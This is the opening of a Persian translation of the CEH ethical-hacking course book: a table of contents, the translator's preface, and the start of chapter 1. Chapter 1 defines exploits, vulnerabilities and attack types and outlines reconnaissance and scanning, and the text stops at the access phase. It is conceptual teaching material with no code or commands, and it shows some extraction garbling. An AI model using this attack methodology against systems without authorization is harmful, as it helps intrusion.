ﻓﻬﺮﺳﺖ ﻣﻄﺎﻟﺐ

ﻣﻘﺪﻣﻪ 2 ﻓﺼﻞ 1 ﻣﻘﺪﻣﻪ اي ﺑﺮ ﻫﻚ ﻗﺎﻧﻮﻧﻤﻨﺪ 3 ﻓﺼﻞ 2 ﺟﻤﻊ آوري اﻃﻼﻋﺎت و ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ 18 18 ﻓﺼﻞ 3 اﺳﻜﻦ و enumeration 36 ﻓﺼﻞ 4 ﻫﻚ ﺳﻴﺴﺘﻢ 61 ﻓﺼﻞ Worm ، Virus ، Backdoor ، Trojan 5 87 ﻓﺼﻞ Sniffer 6 ﻫﺎ 108 ﻓﺼﻞ Session hijacking 7 و Denial of Service 122 ﻫﻚ وب ﺳﺮورﻫﺎ، آﺳﻴﺐ ﭘﺬﻳﺮي ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، و ﺗﻜﻨﻴﻚ ﻫﺎي ﺷﻜﺴﺘﻦ ﻓﺼﻞ 8 142 ﭘﺴﻮردﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ وب ﻓﺼﻞ Buffer Overflow 9 و SQL Injection 164 ﻓﺼﻞ 10 ﻫﻚ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ 178 ﻓﺼﻞ 11 اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ 189 ﻓﺼﻞ 12 ﻫﻚ ﻟﻴﻨﻮﻛﺲ 200 ﻓﺼﻞ 13 ﮔﺮﻳﺰ از IDS ﻫﺎ، honeypot ﻫﺎ، و ﻓﺎﻳﺮوال ﻫﺎ 211 ﻓﺼﻞ 14 رﻣﺰﻧﮕﺎري 223 ﻓﺼﻞ 15 روش ﻫﺎي ﺗﺴﺖ ﻧﻔﻮذ 229

ﻣﻘﺪﻣﻪ

ﻳﻜﻲ از ﻣﻌﺮوف ﺗﺮﻳﻦ و ﻛﺎرﺑﺮدي ﺗﺮﻳﻦ ﻣﺪارك اﻣﻨﻴﺖ، ﻣﺪرك CEH ﻳﺎ ﻣﺪرك ﺗﺨﺼﺼﻲ ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ اﺳﺖ . ﻣﺪرك CEH ، ﻣﺪرﻛﻲ اﻣﻨﻴﺘﻲ ﺑﻪ ﻣﻨﻈﻮر ارزﻳﺎﺑﻲ ﻣﻬﺎرت اﻓﺮاد در ﺑﺮﻗﺮاري اﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ،ﻫﺎ و ﺷﺒﻜﻪ ﻫﺎي ﺳﺎزﻣﺎﻧﻲ و ﻧﻴﺰ ﻛﻤﻚ ﺑﻪ آﻧﻬﺎ ﺟﻬﺖ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺣﻤﻼت و ﻧﻔﻮذﻫﺎي ﻫﻜﺮﻫﺎ اﺳﺖ . در اﻳﻦ دوره اﻓﺮاد ﺑﺎ ﺗﻜﻨﻴﻚ ﻫﺎ و روش ﻫﺎي ﻫﻚ و ﻧﻴﺰ ﭼﻚ ﻟﻴﺴﺖ ﻫﺎي اﻣﻨﻴﺘﻲ آﺷﻨﺎ ﺷﺪه و ﻗﺎدر ﺑﻪ ﺑﺮرﺳﻲ وﺿﻌﻴﺖ اﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢ ﻫﺎ و ﺷﺒﻜﻪ ﻫﺎ ﺧﻮاﻫﻨﺪ ﺑﻮد ﺗﺎ ﻧ ﻘﺎط ﺿﻌﻒ آﻧﻬﺎ را ﺷﻨﺎﺳﺎﻳﻲ و ﺑﺮﻃﺮف ﺳﺎزﻧﺪ . .

ﻛﺘ ﺎﺑﻲ ﻛﻪ ﭘﻴﺶ رو دارﻳﺪ ﺗﺮﺟﻤﻪ ﻛﺘﺎب رﺳﻤﻲ CEH و ﻧﻴﺰ اﺳﻼﻳﺪﻫﺎي آﻣﻮزﺷﻲ ﻣﺮﺑﻮط ﺑﻪ اﻳﻦ ﻣﺪرك، و ﻧﻴﺰ ﺑﺮﺧﻲ از ﺗﺠﺎرب ﺷﺨﺼﻲ ﺑﻨﺪه اﺳﺖ . ﺳﻌﻲ ﺷﺪه اﺳﺖ ﺗﺎﺟﺎﺋﻴﻜﻪ اﻣﻜﺎن دارد ﻣﺘﻦ ﻛﺘﺎب روان ﺑﺎﺷﺪ ﺗﺎ ﻫﺪف اﺻﻠﻲ آن ﻛﻪ اﻧﺘﻘﺎل ﻣﻄﻠﺐ اﺳﺖ، ﺑﻪ درﺳﺘﻲ ﺑﺮآورده ﺷﻮد وﻟﻲ ﻣﻄﻤﺌﻨﺎ اﺷﻜﺎﻻت ﻓﻨﻲ و وﻳﺮاﻳﺸﻲ ﻓﺮاواﻧﻲ دارد ﻛﻪ ﺗﻘﺎﺿﺎ دارم ﺑﻪ اﻃﻼع ﺑﻨﺪه ﺑﺮﺳﺎﻧﻴﺪ ﺗﺎ در ﻧﺴﺨﻪ ﻫﺎي ﺑﻌﺪي ﻛﺘﺎب، اﺻﻼح ﻛﻨﻢ . .

در ﭘﺎﻳﺎن ﺑﺮ ﺧﻮد ﻻزم ﻣﻲ داﻧﻢ ﻛﻪ از ﺗﻤﺎم اﺳﺎﺗﻴﺪي ﻛﻪ ﺑﺮاﻳﻢ زﺣﻤﺖ ﻛﺸﻴﺪه اﻧﺪ ﺑﻪ وﻳﮋه از آﻗﺎﻳﺎن ﻣﻬﻨﺪس راﺳﺘﻲ دوﺳﺖ و ﻣﻬﻨﺪس ﻣﺎﻳﺎن ﻛﻤﺎل ﺗﺸﻜﺮ را داﺷﺘﻪ ﺑﺎﺷﻢ . اﻣﻴﺪوارم ﻛﺘﺎب ﺣﺎﺿﺮ ﺑﺘﻮاﻧﺪ ﮔﺎﻣﻲ ﻫﺮ ﭼﻨﺪ ﻛﻮﭼﻜﻲ در ﺟﻬﺖ اﻓﺰاﻳﺶ ﺳ ﻄﺢ ﻋﻠﻤﻲ ﻫﻤﮕﺎن ﺑﺎﺷﺪ . .

ﻣﺤﺴﻦ آذرﻧﮋاد

[email protected]

ﺗﺎﺑﺴﺘﺎن 90

ﻓﺼﻞ اول

ﻣﻘﺪﻣﻪ اي ﺑﺮ ﻫﻚ ﻗﺎﻧﻮﻧﻤﻨﺪ

ﻣﻘﺪﻣﻪ

اﻏﻠﺐ ﻣﺮدم ﻓﻜﺮ ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ ﻫﻜﺮﻫﺎ، ﻣﻬﺎرت و داﻧﺶ ﺑﺎﻻﻳﻲ دارﻧﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺳﻴﺴﺘﻢ ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮي را ﻫﻚ ﻛﻨﻨﺪ و ﻧﻘﺎط آﺳﻴﺐ ﭘﺬﻳﺮ را ﭘﻴﺪا ﻛﻨﻨﺪ . در ﺣﻘﻴﻘﺖ، ﻳﻚ ﻫﻜﺮ ﺧﻮب، ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﻧﺤﻮه ﻛﺎر ﺳﻴﺴﺘﻢ ﻛﺎﻣﭙﻴﻮﺗﺮي را ﺑﺪاﻧﺪ و ﻧﻴﺰ ﺑﺪاﻧﺪ ﻛﻪ از ﭼﻪ اﺑﺰارﻫﺎﻳﻲ ﺑﺮاي ﻳﺎﻓﺘﻦ ﺿﻌﻒ ﻫﺎي اﻣﻨﻴﺘﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

اﻳﻦ ﻓﺼﻞ دﻧﻴﺎي ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧ ﻤﻨﺪ را ﻣﻌﺮﻓﻲ ﻣﻲ ﻛﻨﺪ . ﻫﻚ ﻗﺎﻧﻮﻧ ﻤﻨﺪ ﻧﻮﻋﻲ ﻫﻚ اﺳﺖ ﻛﻪ ﺑﺎ ﻣﺠﻮز ﺳﺎزﻣﺎﻧﻲ و ﺑﺮاي اﻓﺰاﻳﺶ اﻣﻨﻴﺖ اﻧﺠﺎم ﻣﻲ ﮔﻴﺮد . .

واژﮔﺎن ﻓﻨﻲ

ﺗﻮاﻧﺎﻳﻲ درك و ﺗﻌﺮﻳﻒ اﺻﻄﻼﺣﺎت ﻫﻚ، ﺑﺨﺶ ﻣﻬﻤﻲ از ﻣﺴﺌﻮﻟﻴﺖ ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ اﺳﺖ . در اﻳﻦ ﺑﺨﺶ، در ﻣﻮرد ﺑﺮﺧﻲ از اﺻﻄﻼﺣﺎت راﻳﺞ در دﻧﻴﺎي ﻫﻚ آﺷﻨﺎ ﻣﻲ ﺷﻮﻳﺪ . .

ﺗﻬﺪﻳﺪ ( threat ) ، ﺷﺮاﻳﻂ ﻳﺎ ﺣﺎﻟﺘﻲ اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ اﻣﻨﻴﺖ را ﻣﺨﺘﻞ ﻛﻨﺪ . ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ، زﻣﺎﻧﻴﻜﻪ ﺗﺤﻠﻴﻞ اﻣﻨﻴﺘﻲ اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ، ﺗﻬﺪﻳﺪات را اوﻟﻮﻳﺖ ﺑﻨﺪي ﻣﻲ ﻛﻨﻨﺪ . .

اﻛﺴﭙﻠﻮﻳﺖ ( exploit ) ، ﻗﻄﻌﻪ اي از ﻧﺮم اﻓﺰار، اﺑﺰار ﻳﺎ ﺗﻜﻨﻴﻚ اﺳﺖ ﻛﻪ ﻣﺰاﻳﺎي آﺳﻴﺐ ﭘﺬﻳﺮ ي ﻫﺎ را دارد و ﻣﻲ ﺗﻮاﻧﺪ ﻣﻨﺠﺮ ﺑﻪ اﻳﺠﺎد دﺳﺘﺮﺳﻲ، از دﺳﺖ دادن ﻳﻜﭙﺎرﭼﮕﻲ، ﻳﺎ ﺣﻤﻠﻪ DoS ﺑﺮ روي ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﻣﭙﻴﻮﺗﺮي ﺷﻮد . .

دو دﺳﺘﻪ ﺑﻨﺪي از exploit ﻫﺎ دارﻳﻢ : :

Remote exploit ، روي ﺷﺒﻜﻪ ﻛﺎر ﻣﻲ ﻛﻨﺪ و از آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي اﻣﻨﻴﺘﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﺑﺪون آﻧﻜﻪ از ﻗﺒﻞ ﺑﻪ آن ﺳﻴﺴﺘﻢ دﺳﺘﺮﺳﻲ داﺷﺘﻪ ﺑﺎﺷﺪ . .

Local exploit ، ﻧﻴﺎز ﺑ ﻪ دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ دارد ﺗﺎ ﺳﻄﺢ دﺳﺘﺮﺳﻲ را ﺑﺎﻻ ﺑﺒﺮ .د اﻛﺴﭙﻠﻮﻳﺖ ، روﺷﻲ ﺑﺮاي ﻣﺨﺘﻞ ﻛﺮدن اﻣﻨﻴﺖ ﻳﻚ ﺳﻴﺴﺘﻢ IT از ﻃﺮﻳﻖ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ اﺳﺖ . .

4

آﺳﻴﺐ ﭘﺬﻳﺮي ( vulnerability ) ، وﺟﻮد ﺿﻌﻔﻲ در ﻃﺮاﺣﻲ ﻳﺎ ﭘﻴﺎده ﺳﺎزي ﻧﺮم اﻓﺰار ﺳﻴﺴﺘﻢ اﺳﺖ . ﺑﺎ ﭘﻴﺎده ﺳﺎزي ﺻﺤﻴﺢ و اﻗﺪاﻣﺎت اﻣﻨﻴﺘﻲ، آ ﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ﻛﺎﻫﺶ ﻣﻲ .ﺪﻨﻳﺎﺑ .ﺪﻨﻳﺎﺑ ﻣ ﻲ

ﻫﺪف ارزﻳﺎﺑﻲ ( target of evaluation) ، ﺳﻴﺴﺘﻢ، ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﺷﺒﻜﻪ اي اﺳﺖ ﻛﻪ ﻣﻮﺿﻮع ﺣﻤﻠﻪ ﻳﺎ ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ اﺳﺖ . .

ﺣﻤﻠﻪ ( attack) ، زﻣﺎﻧﻲ رخ ﻣﻲ دﻫﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻲ ﺑﻪ ﺧﺎﻃﺮ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ، ﺑﻪ ﺧﻄﺮ ﻣﻲ اﻓﺘﺪ . ﺑﺴﻴﺎري از ﺣﻤﻼت، ﺑﺎ اﺳﺘﻔﺎده از اﻛﺴﭙﻠﻮﻳﺖ ﻫﺎ، ﻫﻤﻴﺸﮕﻲ ﻣﻲ ﺷﻮﻧﺪ . ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ از اﺑﺰارﻫﺎﻳﻲ ﺑﺮاي ﻳﺎﻓﺘﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﺳﻴﺴﺘﻢ ﻫﺎ ، ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

ﻋﻼوه ﺑﺮ اﻳﻦ اﺻﻄﻼﺣﺎت، ﻻزم اﺳﺖ ﻛﻪ در ﻣﻮرد ﺗﻔﺎوت ﺑﻴﻦ ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧ ﻤﻨﺪ و ﺷﺮور و ﻓﻌﺎﻟﻴﺖ ﻫﺎﻳﻲ ﻛﻪ ﻫﻜﺮ ﻗﺎﻧﻮﻧ ﻤﻨﺪ اﻧﺠﺎم ﻣﻲ دﻫﺪ، آﮔﺎﻫﻲ داﺷﺘﻪ ﺑﺎﺷﻴﺪ . .

اﻧﻮاع ﻣﺨﺘﻠﻒ ﺗﻜﻨﻮﻟﻮژي ﻫﺎي ﻫﻚ

روش ﻫﺎ و اﺑﺰارﻫﺎي زﻳﺎدي ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ، اﺟﺮاي اﻛﺴﭙﻠﻮﻳﺖ ﻫﺎ، و ﺑﻪ ﺧﻄﺮ اﻧﺪاﺧﺘﻦ ﺳﻴﺴﺘﻢ ﻫﺎ وﺟﻮد دارد . ﺗﺮوﺟﺎن ﻫﺎ، backdoor ﻫﺎ، Sniffer ﻫﺎ، rootkit ﻫﺎ، exploit ﻫﺎ، buffer overflow ، و SQl injection ، ﺗﻜﻨﻮﻟﻮژي ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﻫﻚ ﻛﺮدن ﺳﻴﺴﺘﻢ ﻫﺎ ﻳﺎ ﺷﺒﻜﻪ ﻫﺎ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . .

5

ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي ﻫﻚ، ﺑﻪ ﻳﻜﻲ از ﭼﻬﺎر روش زﻳﺮ از ﺿﻌﻒ ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ : :

• ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎ : ﺑﺴﻴﺎري از ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ ﻫﺎ، ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎ را ﺑﺎ ﺗﻨﻈﻴﻤﺎت ﭘﻴﺶ ﻓﺮض ﻧﺼﺐ ﻣﻲ ﻛﻨﻨﺪ در ﻧﺘﻴﺠﻪ، ﻗﺎﺑﻠﻴﺖ آﺳﻴﺐ ﭘﺬﻳﺮي دارﻧﺪ. • ﺑﺮﻧﺎﻣﻪ ﻫﺎ : ﻣﻌﻤﻮﻻ ﺑﺮﻧﺎﻣ ﻪ ﻧﻮﻳﺲ ﻫﺎ، ﺑﺮﻧﺎﻣﻪ ﻫﺎ را ﺗﺴﺖ ﻧﻤﻲ ﻛﻨﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﻫﻜﺮﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ از آﺳﻴﺐ ﭘﺬﻳﺮي آن ﺳﻮ اﺳﺘﻔﺎده ﻛﻨﻨﺪ. • Shrink-wrap code : ﺑﺴﻴﺎري از ﺑﺮﻧﺎﻣﻪ ﻫﺎ، ﻗﺎﺑﻠﻴﺖ ﻫﺎﻳﻲ دارﻧﺪ ﻛﻪ ﻛﺎرﺑﺮان ﻋﺎدي از وﺟﻮد آن ﺑﻲ ﺧﺒﺮﻧﺪ و و ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﻫﻚ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . ﺑﺮاي ﻣﺜﺎل، ﻣﺎﻛﺮوﻫﺎ در ﻧﺮم اﻓﺰار Microsoft word ﺑﻪ ﻫﻜﺮ اﺟﺎزه اﺟﺮاي ﺑﺮﻧﺎﻣﻪ از داﺧﻞ را ﻣﻲ .ﺪﻨدﻫ • ﭘﻴﻜﺮﺑﻨﺪي ﻧﺎدرﺳﺖ : ﻣﻤﻜﻦ اﺳﺖ ﺳﻴﺴﺘﻢ ﺑﻪ درﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪي ﻧﺸﺪه ﺑﺎﺷﺪ ﻳﺎ ﺣﺪاﻗﻞ ﻧﻜﺎت اﻣﻨﻴﺘﻲ در آن رﻋﺎﻳﺖ ﻧ ﺸﺪه ﺑﺎﺷﺪ ﺗﺎ ﻛﺎرﺑﺮان ﺑﺘﻮاﻧﻨﺪ ﺑﻪ راﺣﺘﻲ از ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻛﻨﻨﺪ وﻟﻲ اﻳﻦ اﻣﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻗﺎﺑﻠﻴﺖ آﺳﻴﺐ ﭘﺬﻳﺮي ﺳﻴﺴﺘﻢ را ﺑﺎﻻ ﺑﺒﺮد.

ﻋﻼوه ﺑﺮ اﻧﻮاع ﺗﻜﻨﻮﻟﻮژي ﻫﺎي ﻣﺨﺘﻠﻔﻲ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ اﺳﺘﻔﺎده ﻛﻨﺪ، اﻧﻮاع ﻣﺨﺘﻠﻒ ﺣﻤﻠﻪ ﻧﻴﺰ وﺟﻮد دارد . ﺣﻤﻼت ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ دو دﺳﺘﻪ ﭘﺴﻴﻮ و اﻛﺘﻴﻮ ﺗﻘﺴﻴﻢ ﺷﻮﻧﺪ . ﺣﻤﻼت اﻛﺘﻴﻮ، ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ را ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﻨﺪ وﻟﻲ ﺣﻤﻼت ﭘﺴﻴﻮ، ﺑﻪ دﻧﺒﺎل ﺟﻤﻊ آوري اﻃﻼﻋﺎت از ﺳﻴﺴﺘﻢ ﻫﺎ ﻫﺴﺘﻨﺪ . ﺣﻤﻼت اﻛﺘﻴﻮ، ﺑﺮ روي دﺳﺘﺮﺳﻲ ﭘﺬﻳﺮي، ﻳﻜﭙﺎرﭼﮕﻲ، و ﺻﺤﺖ داده ﻫﺎ ﻣﻮﺛﺮ ﻫﺴﺘﻨﺪ در ﺣﺎﻟﻴﻜﻪ ﺣﻤﻼت ﭘﺴﻴﻮ، ﻣﺤﺮﻣﺎﻧﮕﻲ را ﻣﺨﺘﻞ ﻣﻲ ﻛﻨﻨﺪ . .

ﻋﻼوه ﺑﺮ ﺣﻤﻼت اﻛﺘﻴﻮ و ﭘﺴﻴﻮ، ﻣﻲ ﺗﻮان ﺣﻤﻼت را ﺑﻪ دو دﺳﺘﻪ داﺧﻠﻲ ( insider ) و ﺧﺎرﺟﻲ ( outsider ) ﻧﻴﺰ ﺗﻘﺴﻴﻢ ﻛ ﺮد . ﺷﻜﻞ زﻳﺮ ارﺗﺒﺎط ﺑﻴﻦ ﺣﻤﻼت ﭘﺴﻴﻮ و اﻛﺘﻴﻮ، داﺧﻠﻲ و ﺧﺎرﺟﻲ را ﻧﺸﺎن ﻣﻲ دﻫﺪ . ﺣﻤﻼﺗﻲ ﻛﻪ از داﺧﻞ ﻳﻚ ﺳﺎزﻣﺎن ﺷﻜﻞ ﻣﻲ ﻧﮔﻴﺮ ﺪ، را ﺣﻤﻼت داﺧﻠﻲ ﻣﻲ ﻧﺎﻣﻨﺪ و ﻣﻌﻤﻮﻻ ﺗﻮﺳﻂ ﻛﺎرﻣﻨﺪي از داﺧﻞ ﺳﺎزﻣﺎن ﺻﻮرت ﻣﻲ ﮔﻴﺮد ﺗﺎ ﺑﻪ ﻣﻨﺎﺑﻊ ﺑﻴﺸﺘﺮي دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . ﺣﻤﻠﻪ ﺧﺎرﺟﻲ، از ﺑﻴﺮون ﺳﺎزﻣﺎن ﺻﻮر ت ﻣﻲ ﮔﻴﺮد از ﻗ ﺒﻴﻞ اﻳﻨﺘﺮﻧﺖ . .

اﻧﻮاع ﺣﻤﻼت

6

ﭘﻨﺞ ﻣﺮﺣﻠﻪ ﻣﺨﺘﻠﻒ ﻫﻚ ﻗﺎﻧﻮﻧﻤﻨﺪ

ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ، ﻣﺮاﺣﻠﻲ را ﻛﻪ ﻫﻜﺮ ﺷﺮور اﻧﺠﺎم ﻣﻲ دﻫﺪ را اﻧﺠﺎم ﻣﻲ دﻫﺪ . ﺷﻜﻞ زﻳﺮ، ﭘﻨﺞ ﻣﺮﺣﻠﻪ اي ﻛﻪ ﻫﻜﺮﻫﺎ ﺑﺮاي ﻫﻚ ﻛﺮدن ﺳﻴﺴﺘﻢ ﻫﺎ اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ را ﺗﻮﺿﻴﺢ ﻣﻲ دﻫﺪ . .

ﻣﺮاﺣﻞ ﻫﻚ

ﻣﺮﺣﻠﻪ 1 : ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻴﻮ و اﻛﺘﻴﻮ

ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻴﻮ، ﺷﺎﻣﻞ ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﺑﺎ در ﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻫﺪف ﺑﺎﻟﻘﻮه ﺑﺪون ﻣﺪ ﻧﻈﺮ ﻗﺮار دادن داﻧﺶ ﺷﺨﺺ ﻳﺎ ﺷﺮﻛﺖ اﺳﺖ . ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻴﻮ، ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﺳﺎدﮔﻲ ﺗﻤﺎﺷﺎي ﻳﻚ ﺳﺎﺧﺘﻤﺎن ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ زﻣﺎن ورود و ﺧﺮوج ﻛﺎرﻣﻨﺪان ﺑﺎﺷﺪ . اﻣﺎ ﻣﻌﻤﻮل اﺳﺖ ﻛﻪ از ﺟﺴﺘﺠﻮي اﻳﻨﺘﺮﻧﺘﻲ اﺳﺘﻔﺎده ﺷﻮد ﻳﺎ در ﻣﻮرد ﺷﺮﻛﺖ و ﻛﺎرﻣﻨﺪان آن، اﻃﻼﻋﺎت ﺟﻤﻊ آوري ﺷﻮد . اﻳﻦ ﻓﺮآﻳﻨﺪ، ﺑﻄﻮر ﻛﻠﻲ، ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد . ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ( social engineering ) و آﺷﻐﺎل ﮔﺮدي ( dumpster diving ) ﺑﻪ ﻋﻨﻮان روش ﻫﺎي ﭘﺴﻴﻮ ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﺗﻠﻘﻲ ﻣﻲ ﺷﻮد . .

اﺳﺘﺮاق ﺳﻤﻊ ﺷﺒﻜﻪ ( sniffing ) ، روش دﻳﮕﺮي ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻴﻮ اﺳﺖ و ﻣﻲ ﺗﻮاﻧﺪ اﻃﻼﻋﺎت ﻣﻔﻴﺪي ﻫﻤﭽﻮن آدرس ﻫﺎي IP ، ﻗﺎﻧﻮن ﻧﺎم ﮔﺬاري دﺳﺘﮕﺎه ﻫﺎ، و ﺳﺮوﻳﺲ ﻫﺎي ﻗﺎﺑﻞ دﺳﺘﺮس دﻳﮕﺮ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺎ و ﺷﺒﻜﻪ ﻫﺎي دﻳﮕﺮ را ﺑﺪﻫﺪ . اﺳﺘﺮاق ﺳﻤﻊ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ، ﻣﺸﺎﺑﻪ ﻣﺎﻧﻴﺘﻮرﻳﻨﮓ اﺳﺖ : ﻫﻜﺮ، ﺗﺮاﻓﻴﻚ داده ﻫﺎ را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ ﭼﻪ زﻣﺎﻧﻲ ﺗﺮاﻛﻨﺶ ﻫﺎي ﻣﺸﺨﺺ اﺗﻔﺎق ﻣﻲ اﻓﺘﺪ و ﺗﺮاﻓﻴﻚ از ﻛﺠﺎ ﺟﺮﻳﺎن ﻣﻲ ﻳﺎﺑﺪ . . 7

ﺷﻨﺎﺳﺎﻳﻲ اﻛﺘﻴﻮ، ﻛﺎوش ﺷﺒﻜﻪ ﺑﺮاي ﻛﺸﻒ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي ا ﻓﺮاد ، آدرس ﻫﺎي IP ، و ﺳﺮوﻳﺲ ﻫﺎي ﺷﺒﻜﻪ اﺳﺖ . ﻣﻌﻤﻮﻻ ﻧﺴﺒﺖ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻴﻮ، داراي رﻳﺴﻚ ﺑﺎﻻﻳﻲ اﺳﺖ و ﮔﺎﻫﻲ اوﻗﺎت از آن ﺑﻪ ﻋﻨﻮان rattling the door knobe ﻧﺎم ﺑﺮده ﻣﻲ ﺷﻮد . .

ﺷﻨﺎﺳﺎﻳﻲ اﻛﺘﻴﻮ و ﭘﺴﻴﻮ، ﻫﺮ دو ﻣﻨﺠﺮ ﺑﻪ ﻛﺸﻒ اﻃﻼﻋﺎت ﻣﻔﻴﺪ ﺑﺮاي ﺣﻤﻠﻪ ﻣﻲ ﺷﻮﻧﺪ . ﺑﺮاي ﻣﺜﺎل، ﻣﻌﻤﻮﻻ ﻳﺎﻓﺘﻦ ﻧﻮع وب ﺳﺮور و ﻧﺴﺨﻪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻲ ﻛﻪ ﺳﺎزﻣﺎن اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ، ﺳﺎده اﺳﺖ . اﻳﻦ اﻃﻼﻋﺎت ﺑﻪ ﻫﻜﺮ ﻛﻤﻚ ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﭘﻴﺪا ﻛﻨﺪ و از اﻛﺴﭙﻠﻮﻳﺖ ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ اﺳﺘﻔﺎده ﻛﻨﺪ . .

ﻣﺮﺣﻠﻪ 2 : اﺳﻜﻦ

ﺑﺪﺳﺖ آوردن اﻃﻼﻋﺎت ﻛﺸﻒ ﺷﺪه در ﻃﻮل ﺷﻨﺎﺳﺎﻳﻲ ، و اﺳﺘﻔﺎده از آن ﺑﺮاي ﺗﺴﺖ ﺷﺒﻜﻪ اﺳﺖ . اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﻫﻜﺮ در ﻃﻮل ﻣﺮﺣﻠﻪ اﺳﻜﻦ ﺑﻜﺎر ﻣﻲ ﮔﻴﺮد ﻣﻲ ﺗﻮاﻧﺪ dialer ﻫﺎ، اﺳﻜﻨﺮﻫﺎي ﭘﻮرت، اﺑﺰارﻫﺎي ﺗ ﺮﺳﻴﻢ ﻧﻘﺸﻪ ﺷﺒﻜﻪ، sweeper ﻫﺎ و اﺳﻜﻨﺮﻫﺎي ﺗﺴﺖ آﺳﻴﺐ ﭘﺬﻳﺮي ﺑﺎﺷ ﺪﻨ . ﻫﻜﺮﻫﺎ ﺑﻪ دﻧﺒﺎل اﻃﻼﻋﺎﺗﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻪ آﻧﻬﺎ در اﻧﺠﺎم ﺣﻤﻠﻪ ﻛﻤﻚ ﻛﻨﺪ از ﻗﺒﻴﻞ ﻧﺎم ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎ، آدرس ﻫﺎي IP ، و ﺣﺴﺎب ﻫﺎي ﻛﺎرﺑﺮي . .

ﻣﺮﺣﻠﻪ 3 : اﻳﺠﺎد دﺳﺘﺮﺳﻲ

